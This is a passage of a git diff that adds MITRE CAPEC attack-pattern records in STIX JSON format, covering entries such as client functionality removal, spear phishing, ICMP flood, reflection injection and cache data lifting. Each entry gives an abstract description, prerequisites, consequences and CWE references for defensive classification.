hard-to-find bug in the software that allows under very specific conditions for encryption to be disabled on data streams. The attacker commits the change to the code which is picked up by a manufacturer who develops VPN software. It is eventually deployed at the victim's location where the very specific conditions are met, and the attacker is able to sniff plaintext traffic thought to be encrypted, allowing the attacker to gain access to sensitive data of the victim." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the open source code base being used by the manufacturer in a system being developed or currently deployed at a victim location." + ], + "x_capec_skills_required": { + "High": "Advanced knowledge about the inclusion and specific usage of an open source code project within system being targeted for infiltration." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7.json b/capec/attack-pattern/attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7.json new file mode 100644 index 0000000000..375b374411 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7.json @@ -0,0 +1,94 @@ +{ + "type": "bundle", + "id": "bundle--6462a220-58d4-4801-9340-8a8f48fe42de", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Removing Important Client Functionality", + "description": "An attacker removes or disables functionality on the client that the server assumes to be present and trustworthy. Attackers can, in some cases, get around logic put in place to 'guard' sensitive functionality or data. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an attacker can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/207.html", + "external_id": "CAPEC-207" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html", + "external_id": "CWE-602" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Greasemonkey", + "external_id": "REF-75" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Firebug", + "url": "http://getfirebug.com/", + "external_id": "REF-76" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Mozilla Firefox Add-ons", + "url": "https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/", + "external_id": "REF-77" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "Attacker reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.", + "Attacker uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they're not authorized to use, the Attacker directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks).", + "Attacker reverse-engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client." + ], + "x_capec_resources_required": [ + "The attacker must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary." + ], + "x_capec_skills_required": { + "High": "To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on.", + "Low": "The attacker installs a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--27e1e9fc-726a-4ff4-81c1-5ecd490cce03.json b/capec/attack-pattern/attack-pattern--27e1e9fc-726a-4ff4-81c1-5ecd490cce03.json new file mode 100644 index 0000000000..4b05eb7cca --- /dev/null +++ b/capec/attack-pattern/attack-pattern--27e1e9fc-726a-4ff4-81c1-5ecd490cce03.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--1bf1524b-ceb9-4a7f-b235-a4cfdf63f86e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--27e1e9fc-726a-4ff4-81c1-5ecd490cce03", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: XSS Using Flash", + "description": "This pattern has been deprecated as it is covered by a chaining relationship between CAPEC-174: Flash Parameter Injection and CAPEC-591: Stored XSS. Please refer to these CAPECs going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/246.html", + "external_id": "CAPEC-246" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--28006a72-8857-4c1a-be3e-c392e9291cb5.json b/capec/attack-pattern/attack-pattern--28006a72-8857-4c1a-be3e-c392e9291cb5.json new file mode 100644 index 0000000000..7ce156c136 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--28006a72-8857-4c1a-be3e-c392e9291cb5.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--68435804-9207-4b57-84c5-a9d17bc079b7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--28006a72-8857-4c1a-be3e-c392e9291cb5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Collect Data as Provided by Users", + "description": "An attacker leverages a tool, device, or program to obtain specific information as provided by a user of the target system. This information is often needed by the attacker to launch a follow-on attack. This attack is different than Social Engineering as the adversary is not tricking or deceiving the user. Instead the adversary is putting a mechanism in place that captures the information that a user legitimately enters into a system. Deploying a keylogger, performing a UAC prompt, or wrapping the Windows default credential provider are all examples of such interactions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/569.html", + "external_id": "CAPEC-569" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--285f4e6f-6fa1-4005-989a-2b1e86e8f1e9.json b/capec/attack-pattern/attack-pattern--285f4e6f-6fa1-4005-989a-2b1e86e8f1e9.json new file mode 100644 index 0000000000..2130379140 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--285f4e6f-6fa1-4005-989a-2b1e86e8f1e9.json @@ -0,0 +1,113 @@ +{ + "type": "bundle", + "id": "bundle--116186db-704e-4e90-ae33-64cda29251f6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--285f4e6f-6fa1-4005-989a-2b1e86e8f1e9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Using Malicious Files", + "description": "An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/17.html", + "external_id": "CAPEC-17" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html", + "external_id": "CWE-732" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/272.html", + "external_id": "CWE-272" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html", + "external_id": "CWE-59" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/282.html", + "external_id": "CWE-282" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/275.html", + "external_id": "CWE-275" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/264.html", + "external_id": "CWE-264" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html", + "external_id": "CWE-270" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Consider a directory on a web server with the following permissions\n drwxrwxrwx 5 admin public 170 Nov 17 01:08 webroot\n This could allow an attacker to both execute and upload and execute programs' on the web server. This one vulnerability can be exploited by a threat to probe the system and identify additional vulnerabilities to exploit.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "System's configuration must allow an attacker to directly access executable files or upload files to execute. This means that any access control system that is supposed to mediate communications between the subject and the object is set incorrectly or assumes a benign environment." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41.json b/capec/attack-pattern/attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41.json new file mode 100644 index 0000000000..5e9ec73714 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--3f0922e1-dace-4166-a518-4b104b008d18", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Excessive Allocation", + "description": "An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/130.html", + "external_id": "CAPEC-130" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html", + "external_id": "CWE-404" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (A successful excessive allocation attack forces the target system to exhaust its resources, thereby compromising the availability of its service.)" + ] + }, + "x_capec_example_instances": [ + "In an Integer Attack, the adversary could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must accept service requests from the attacker and the adversary must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the adversary to manipulate variables used in the allocation." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--28ca67a7-6c1e-4c2e-81d0-5b4b389e4ddd.json b/capec/attack-pattern/attack-pattern--28ca67a7-6c1e-4c2e-81d0-5b4b389e4ddd.json new file mode 100644 index 0000000000..4f200fdcf1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--28ca67a7-6c1e-4c2e-81d0-5b4b389e4ddd.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--be073100-3230-4e3e-bc54-a29678e31b37", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--28ca67a7-6c1e-4c2e-81d0-5b4b389e4ddd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "ICMP Flood", + "description": "An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/487.html", + "external_id": "CAPEC-487" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2a5de98d-00b7-45da-8f6c-b5c722741929.json b/capec/attack-pattern/attack-pattern--2a5de98d-00b7-45da-8f6c-b5c722741929.json new file mode 100644 index 0000000000..08229f7d47 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2a5de98d-00b7-45da-8f6c-b5c722741929.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--e7fedaae-9f34-49f0-8c7b-19ef7f3ad312", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2a5de98d-00b7-45da-8f6c-b5c722741929", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Reflection Injection", + "description": "An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/138.html", + "external_id": "CAPEC-138" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The target application must utilize reflection libraries and allow users to directly control the parameters to these methods. If the adversary can host classes where the target can invoke them, more powerful variants of this attack are possible.", + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2a6965de-02e0-49c0-a275-63cf742c758f.json b/capec/attack-pattern/attack-pattern--2a6965de-02e0-49c0-a275-63cf742c758f.json new file mode 100644 index 0000000000..b5c29d01e5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2a6965de-02e0-49c0-a275-63cf742c758f.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--afa95b73-a000-40ed-a080-ee281dd2787f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2a6965de-02e0-49c0-a275-63cf742c758f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Lifting Sensitive Data Embedded in Cache", + "description": "An attacker examines a target application's cache for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/204.html", + "external_id": "CAPEC-204" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/524.html", + "external_id": "CWE-524" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The target application must store sensitive information in a cache.", + "The cache must be inadequately protected against attacker access." + ], + "x_capec_resources_required": [ + "The attacker must be able to reach the target application's cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2b15bd31-9fa4-4ff4-9986-75f61cf72186.json b/capec/attack-pattern/attack-pattern--2b15bd31-9fa4-4ff4-9986-75f61cf72186.json new file mode 100644 index 0000000000..853e5879fa --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2b15bd31-9fa4-4ff4-9986-75f61cf72186.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--cc56a1e5-248b-4c62-b22f-67c49e273339", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2b15bd31-9fa4-4ff4-9986-75f61cf72186", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Spear Phishing", + "description": "An adversary targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/163.html", + "external_id": "CAPEC-163" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Accountability": [ + "Gain Privileges (Privilege Escalation)" + ], + "Authentication": [ + "Gain Privileges (Privilege Escalation)" + ], + "Authorization": [ + "Gain Privileges (Privilege Escalation)" + ], + "Confidentiality": [ + "Read Data (Information Leakage)" + ], + "Integrity": [ + "Modify Data (Data Modification)" + ], + "Non-Repudiation": [ + "Gain Privileges (Privilege Escalation)" + ] + }, + "x_capec_example_instances": [ + "The target, John, gets an official looking e-mail from his bank stating that his or her account has been temporarily locked due to suspected unauthorized activity that happened in the area different that where he lives (details might be provided by the spear phishers) and that John needs to click on the link included in the e-mail to log in to his bank account in order to unlock it. The link in the e-mail looks very similar to that of his bank and once the link is clicked, the log in page is the exact replica. John supplies his login credentials after which he is notified that his account has now been unlocked and that everything is fine. An adversary has just collected John's online banking information which can now be used by him or her to log into John's bank account and transfer John's money to a bank account of the adversary's choice.", + "An adversary can leverage a weakness in the SMB protocol by sending the target, John, an official looking e-mail from his employer's IT Department stating that his system has vulnerable software, which he needs to manually patch by accessing an updated version of the software by clicking on a provided link to a network share. Once the link is clicked, John is directed to an external server controlled by the adversary or to a malicious file on a public access share. The SMB protocol will then attempt to authenticate John to the adversary controlled server, which allows the adversary to capture the hashed credentials over SMB. These credentials can then be used to execute offline brute force attacks or a \"Pass The Hash\" attack." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "None. Any user can be targeted by a Spear Phishing attack." + ], + "x_capec_resources_required": [ + "An adversay must have the ability communicate their phishing scheme to the victims (via email, instance message, etc.), as well as a website or other platform for victims to enter personal information into." + ], + "x_capec_skills_required": { + "Medium": "Spear phishing attacks require specific knowledge of the victims being targeted, such as which bank is being used by the victims, or websites they commonly log into (Google, Facebook, etc)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2b255fdc-4366-4755-9e4c-90c1502b7678.json b/capec/attack-pattern/attack-pattern--2b255fdc-4366-4755-9e4c-90c1502b7678.json new file mode 100644 index 0000000000..14f03bc717 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2b255fdc-4366-4755-9e4c-90c1502b7678.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--c2986dae-1306-4886-9434-54189ba69385", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2b255fdc-4366-4755-9e4c-90c1502b7678", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Documentation Alteration to Produce Under-performing Systems", + "description": "An attacker with access to a manufacturer's documentation alters the descriptions of system capabilities with the intent of causing errors in derived system requirements, impacting the overall effectiveness and capability of the system, allowing an attacker to take advantage of the introduced system capability flaw once the system is deployed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/518.html", + "external_id": "CAPEC-518" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "A security subsystem involving encryption is a part of a product, but due to the demands of this subsystem during operation, the subsystem only runs when a specific amount of memory and processing is available. An attacker alters the descriptions of the system capabilities so that when deployed with the minimal requirements at the victim location, the encryption subsystem is never operational, leaving the system in a weakened security state." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of software and hardware capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2b924641-5ed0-411c-bcfe-02ff55a2ec73.json b/capec/attack-pattern/attack-pattern--2b924641-5ed0-411c-bcfe-02ff55a2ec73.json new file mode 100644 index 0000000000..285b271e11 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2b924641-5ed0-411c-bcfe-02ff55a2ec73.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--3bae8ddc-eaa6-41cb-9967-14c0ca0d53c3", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2b924641-5ed0-411c-bcfe-02ff55a2ec73", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Web Services Protocol Manipulation", + "description": "An adversary manipulates a web service related protocol to cause a web application or service to react differently than intended. This can either be performed through the manipulation of call parameters to include unexpected values, or by changing the called function to one that should normally be restricted or limited. By leveraging this pattern of attack, the adversary is able to gain access to data or resources normally restricted, or to cause the application or service to crash.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/278.html", + "external_id": "CAPEC-278" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The targeted application or service must rely on web service protocols in such a way that malicious manipulation of them can alter functionality." + ], + "x_capec_resources_required": [ + "The attacker must be able to manipulate the communications to the targeted application or service." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2bd9317a-65b9-4684-be47-ea3f173f47ff.json b/capec/attack-pattern/attack-pattern--2bd9317a-65b9-4684-be47-ea3f173f47ff.json new file mode 100644 index 0000000000..49eea007b5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2bd9317a-65b9-4684-be47-ea3f173f47ff.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--06128a85-1414-4f7a-9c96-d13fb530305b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2bd9317a-65b9-4684-be47-ea3f173f47ff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Application Footprinting", + "description": "An adversary engages in active probing and exploration activities to determine the type or version of an application installed on a remote target. This differs from fingerprinting where the attacker's action is passive through the examination of application output.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/580.html", + "external_id": "CAPEC-580" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have logical access to the target network and system." + ], + "x_capec_skills_required": { + "Low": "The adversary needs to know basic linux commands." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--2c2565bb-c39a-4d70-96cc-d7ea60b5abb0.json b/capec/attack-pattern/attack-pattern--2c2565bb-c39a-4d70-96cc-d7ea60b5abb0.json new file mode 100644 index 0000000000..e98d5bc4b4 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--2c2565bb-c39a-4d70-96cc-d7ea60b5abb0.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--e23ec95d-fecc-4518-ab0d-774927cffab1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--2c2565bb-c39a-4d70-96cc-d7ea60b5abb0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Spoofing of UDDI/ebXML Messages", + "description": "An attacker spoofs a UDDI, ebXML, or similar message in order to 